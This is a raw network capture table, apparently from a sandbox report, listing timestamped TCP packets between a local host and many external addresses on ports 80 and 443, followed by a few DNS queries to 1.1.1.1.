                                                                                                                                                                                                              Aug 23, 2024 18:48:58.689873934 CEST805638718.208.156.248192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.692333937 CEST5638880192.168.2.4208.100.26.245
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.715426922 CEST8056388208.100.26.245192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.715497017 CEST5638880192.168.2.4208.100.26.245
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.715660095 CEST5638880192.168.2.4208.100.26.245
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.737487078 CEST8056388208.100.26.245192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.757750034 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.771104097 CEST5639080192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.784487963 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.786489010 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.787022114 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.794823885 CEST805639044.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.794902086 CEST5639080192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.795012951 CEST5639080192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.802936077 CEST5639180192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.805474997 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.809595108 CEST805639044.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.818198919 CEST8056391172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.818286896 CEST5639180192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.818416119 CEST5639180192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.829689980 CEST8056391172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.884098053 CEST5639280192.168.2.43.94.10.34
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.899760008 CEST80563923.94.10.34192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.899833918 CEST5639280192.168.2.43.94.10.34
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.899947882 CEST5639280192.168.2.43.94.10.34
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.916002035 CEST80563923.94.10.34192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.114545107 CEST5639380192.168.2.469.162.80.58
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.133501053 CEST805639369.162.80.58192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.133569956 CEST5639380192.168.2.469.162.80.58
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.133737087 CEST5639380192.168.2.469.162.80.58
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.149997950 CEST805639369.162.80.58192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.222850084 CEST80563843.64.163.50192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.222908974 CEST5638480192.168.2.43.64.163.50
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.224190950 CEST5638480192.168.2.43.64.163.50
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.226248026 CEST805638718.208.156.248192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.226259947 CEST805638718.208.156.248192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.226341009 CEST5638780192.168.2.418.208.156.248
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.227231026 CEST5638780192.168.2.418.208.156.248
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.232975006 CEST805638644.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.233026981 CEST5638680192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.233707905 CEST5638680192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.235328913 CEST80563843.64.163.50192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.235341072 CEST805638644.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.235389948 CEST5638680192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.235722065 CEST805638718.208.156.248192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.242503881 CEST805638644.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.281402111 CEST8056388208.100.26.245192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.281481981 CEST5638880192.168.2.4208.100.26.245
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.282566071 CEST5638880192.168.2.4208.100.26.245
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.299763918 CEST8056388208.100.26.245192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.323843956 CEST8056383162.255.119.102192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.323898077 CEST5638380192.168.2.4162.255.119.102
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.339868069 CEST805639044.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.339922905 CEST5639080192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.340502977 CEST5639480192.168.2.485.17.31.122
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.341003895 CEST5639080192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.343770981 CEST805639044.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.343816996 CEST5639080192.168.2.444.221.84.105
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.354975939 CEST805639485.17.31.122192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.355140924 CEST5639480192.168.2.485.17.31.122
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.355257988 CEST5639480192.168.2.485.17.31.122
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.356765032 CEST805639044.221.84.105192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.360418081 CEST8056391172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.360466003 CEST5639180192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.360549927 CEST5639180192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.361386061 CEST5639580192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.365504026 CEST805639485.17.31.122192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.369467020 CEST8056391172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.370623112 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.373733997 CEST8056395172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.373795986 CEST5639580192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.373905897 CEST5639580192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.382030964 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.382095098 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.382220030 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.386611938 CEST8056395172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.394071102 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.413589001 CEST8056388208.100.26.245192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.413638115 CEST5638880192.168.2.4208.100.26.245
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.424563885 CEST80563843.64.163.50192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.424614906 CEST5638480192.168.2.43.64.163.50
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.438848972 CEST80563923.94.10.34192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.438926935 CEST5639280192.168.2.43.94.10.34
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.439702034 CEST5639280192.168.2.43.94.10.34
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.440896988 CEST80563923.94.10.34192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.440946102 CEST5639280192.168.2.43.94.10.34
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.466737032 CEST80563923.94.10.34192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.720093966 CEST805639369.162.80.58192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.720187902 CEST5639380192.168.2.469.162.80.58
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.720263004 CEST5639380192.168.2.469.162.80.58
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.721370935 CEST805639369.162.80.58192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.721427917 CEST5639380192.168.2.469.162.80.58
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.725783110 CEST805639369.162.80.58192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.921673059 CEST8056395172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.921822071 CEST5639580192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.921822071 CEST5639580192.168.2.4172.234.222.143
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.927074909 CEST8056395172.234.222.143192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.092837095 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.092910051 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.094475031 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.094486952 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.094537020 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.102341890 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.102353096 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.102399111 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.110156059 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.110168934 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.110291004 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.117014885 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.117027044 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.117038012 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.117069960 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.117099047 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.121284008 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.121295929 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.121354103 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.143810987 CEST8056385188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.145020008 CEST5638580192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.152236938 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.152278900 CEST44356397188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.152410984 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.152739048 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.152750969 CEST44356397188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.223581076 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.223629951 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.224920034 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.224931955 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.224982023 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.230887890 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.230900049 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.230931044 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.230942011 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.240819931 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.240833044 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.240860939 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.240879059 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.244121075 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.244137049 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.244146109 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.244163036 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.244167089 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.244191885 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.244210005 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.250389099 CEST805639485.17.31.122192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.250436068 CEST5639480192.168.2.485.17.31.122
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.252954960 CEST5639680192.168.2.491.195.240.19
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.260982990 CEST805639691.195.240.19192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.273077011 CEST5639480192.168.2.485.17.31.122
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.276422977 CEST5639880192.168.2.485.17.31.122
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.281614065 CEST805639485.17.31.122192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.284240961 CEST805639885.17.31.122192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.284318924 CEST5639880192.168.2.485.17.31.122
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.285015106 CEST5639880192.168.2.485.17.31.122
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.297919989 CEST805639885.17.31.122192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.604123116 CEST5639980192.168.2.4154.212.231.82
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.612562895 CEST8056399154.212.231.82192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.615441084 CEST5639980192.168.2.4154.212.231.82
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.692538977 CEST44356397188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.692656994 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.763436079 CEST5639980192.168.2.4154.212.231.82
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.768467903 CEST8056399154.212.231.82192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.831562996 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.831769943 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.832968950 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.832982063 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.833003044 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.833020926 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.838660955 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.838679075 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.838727951 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.844976902 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.844990969 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.845043898 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.851492882 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.851505995 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.851519108 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.851560116 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.851578951 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.855628014 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.855639935 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.855648041 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.855694056 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.925589085 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.926498890 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.926569939 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.928419113 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.928431988 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.928477049 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.932173967 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.932185888 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.932234049 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.936063051 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.936075926 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.936120033 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.940318108 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.940330982 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.940375090 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.944595098 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.944607973 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.944655895 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.947921038 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.947935104 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.947987080 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.951286077 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.951298952 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.951313019 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.951353073 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.951386929 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.954724073 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.954735994 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.954790115 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.958156109 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.958168030 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.958225012 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.961051941 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.961065054 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.961075068 CEST8056389199.191.50.83192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.961116076 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.961141109 CEST5638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.436522961 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.436556101 CEST44356397188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.436903000 CEST44356397188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.437025070 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.437557936 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.480494976 CEST44356397188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.672589064 CEST8056399154.212.231.82192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.672637939 CEST5639980192.168.2.4154.212.231.82
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.674352884 CEST5639980192.168.2.4154.212.231.82
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.681093931 CEST8056399154.212.231.82192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.919549942 CEST805639885.17.31.122192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.919617891 CEST5639880192.168.2.485.17.31.122
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.919692993 CEST5639880192.168.2.485.17.31.122
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.928530931 CEST805639885.17.31.122192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.062125921 CEST44356397188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.062172890 CEST44356397188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.062187910 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.062215090 CEST44356397188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.062227964 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.062256098 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.065207958 CEST44356397188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.065254927 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.065262079 CEST44356397188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.065303087 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.065958977 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.065979958 CEST56397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.067445993 CEST5638580192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.081264019 CEST8056385188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.104231119 CEST8056399154.212.231.82192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.104296923 CEST5639980192.168.2.4154.212.231.82
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.182677984 CEST8056385188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.182842970 CEST5638580192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.188117027 CEST56400443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.188162088 CEST44356400188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.188229084 CEST56400443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.188529015 CEST56400443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.188540936 CEST44356400188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.676887989 CEST44356400188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.676961899 CEST56400443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.679342031 CEST56400443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.679359913 CEST44356400188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.679620028 CEST44356400188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.679665089 CEST56400443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.680126905 CEST56400443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.720496893 CEST44356400188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.287703991 CEST44356400188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.287823915 CEST44356400188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.287889957 CEST56400443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.287921906 CEST44356400188.114.96.3192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.287961006 CEST56400443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.288186073 CEST56400443192.168.2.4188.114.96.3
                                                                                                                                                                                                              Aug 23, 2024 18:49:04.288208961 CEST56400443192.168.2.4188.114.96.3
                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Aug 23, 2024 18:46:59.878585100 CEST5481653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.194921970 CEST6511553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.233679056 CEST6042653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.245896101 CEST5463053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.246351004 CEST5300453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.247881889 CEST5240453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.273297071 CEST53530041.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:00.289416075 CEST53524041.1.1.1192.168.2.4
